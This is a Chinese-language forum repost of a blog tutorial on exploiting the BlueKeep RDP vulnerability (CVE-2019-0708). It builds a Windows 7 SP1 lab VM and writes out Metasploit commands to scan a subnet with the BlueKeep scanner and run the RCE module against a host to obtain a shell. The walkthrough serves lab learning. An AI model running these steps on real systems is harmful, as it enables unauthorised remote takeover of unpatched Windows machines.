跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

msf之CVE-2019-0708-Bluekeep漏洞利用模块

精选回复

发布于

漏洞介绍

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。

从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。

BlueKeep-Header.png

靶场环境

漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,

  • 001使用VM安装Windows7 SP1模拟受害机
    Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):

迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx

  • 002 msf配置
    下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp

    扫描存在漏洞的主机

    msfconsole
    search 0708 #扫描可用模块
    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块
    set RHOSTS 192.168.1.1/24 #设置扫描地址池
    run

    请输入图片描述
    如图,可以扫描到当前网段有设备192.168.1.8存在该漏洞。

    漏洞利用

    利用msf攻击

    在利用msf攻击时,需要注意配置RHOSTStarget这两个参数

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.8
set target 2 (当前靶机为虚拟机安装的win7)
run

成功得到shell
请输入图片描述
target参数

Exploit target:

   Id  Name
   --  ----
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/1378.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。